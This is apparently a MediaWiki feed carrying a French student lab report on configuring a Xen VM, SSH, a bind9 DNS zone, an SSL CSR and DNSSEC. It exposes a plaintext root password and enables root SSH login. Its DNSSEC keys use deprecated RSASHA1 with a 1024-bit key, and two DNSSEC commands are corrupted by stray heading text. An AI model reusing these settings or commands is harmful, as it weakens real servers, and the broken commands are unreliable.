<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rlassery</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rlassery"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Rlassery"/>
		<updated>2026-05-12T22:00:29Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58083</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58083"/>
				<updated>2022-01-12T17:06:16Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
==Configuration du SSH== &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
==Configuration du DNS==&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
Note : Après avoir constaté que le serveur secondaire ne se mettait pas à jour après chaque &amp;quot;notify&amp;quot; du serveur primaire, nous avons finalement choisi d'utiliser le serveur ns1.belle-rose.site en tant que serveur secondaire. &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.local:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.local&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Nous avons séparés configuration des serveurs autorisés à dupliqué nos zones de la config de nos zones en insérant les acl suivantes dans le fichier /etc/bind/named.conf. &lt;br /&gt;
&lt;br /&gt;
 options {&lt;br /&gt;
	 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
	 dnssec-validation auto;&lt;br /&gt;
 	 dnssec-enable yes;&lt;br /&gt;
	 dnssec-lookaside auto;&lt;br /&gt;
	 listen-on-v6 { any; };&lt;br /&gt;
	 allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40; //@ de ns6.gandi.net mais plus utilisé au final&lt;br /&gt;
   193.48.57.181; //@ de ns1.belle-rose.site&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns1.belle-rose.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns1.belle-rose.site.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
==HTTPS / Certificat SSL==&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
'''4.4 Sécurisation de serveur DNS par DNSSEC'''&lt;br /&gt;
&lt;br /&gt;
Activer DNSSEC&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.options on ajoute les lignes :&lt;br /&gt;
 dnssec-validation yes;&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
 dnssec-lookaside auto;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/paixdieu.site.dnssed/&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZO'''4.4 Sécurisation de serveur DNS par DNSSEC'''NE paixdieu.site&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite, on crée la clé asymétrique de la zone pour signer les enregistrements :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.key paixdieu.site-ksk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.private paixdieu.site-ksk.private&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.key paixdieu.site-zsk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.private paixdieu.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
On les inclue à la suite de /etc/bind/db.paixdieu.site&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-ksk.key&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Puis incrémente le numéro de série (5=&amp;gt;6)&lt;br /&gt;
&lt;br /&gt;
On signe des enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o paixdieu.site -k paixdie'''4.4 Sécurisation de serveur DNS par DNSSEC'''u.site-ksk ../db.paixdieu.site paixdieu.site-zsk&lt;br /&gt;
&lt;br /&gt;
Prise en compte du fichier signé&lt;br /&gt;
  &lt;br /&gt;
On modifie le fichier /etc/bind/named.conf.local de la manière suivante :&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/db.paixdieu.site.signed&amp;quot;;&lt;br /&gt;
	allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Pour finir, nous allons sur gandi.net, sur notre nom de domaine dans DNSSEC et nous ajoutons les deux clefs (zsk et ksk avec l'algorithme 5 (RSA/SHA-1).&lt;br /&gt;
Et nous vérifions la bon fonctionnement du DNSSEC de la manière suivante :&lt;br /&gt;
 &amp;gt; dnssec-verify -o paixdieu.site db.paixdieu.site.signed&lt;br /&gt;
&lt;br /&gt;
 Loading zone 'paixdieu.site' from file 'db.paixdieu.site.signed'&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms:&lt;br /&gt;
 - RSASHA1&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
&lt;br /&gt;
'''4.3 Sécurisation de site web par certificat'''&lt;br /&gt;
&lt;br /&gt;
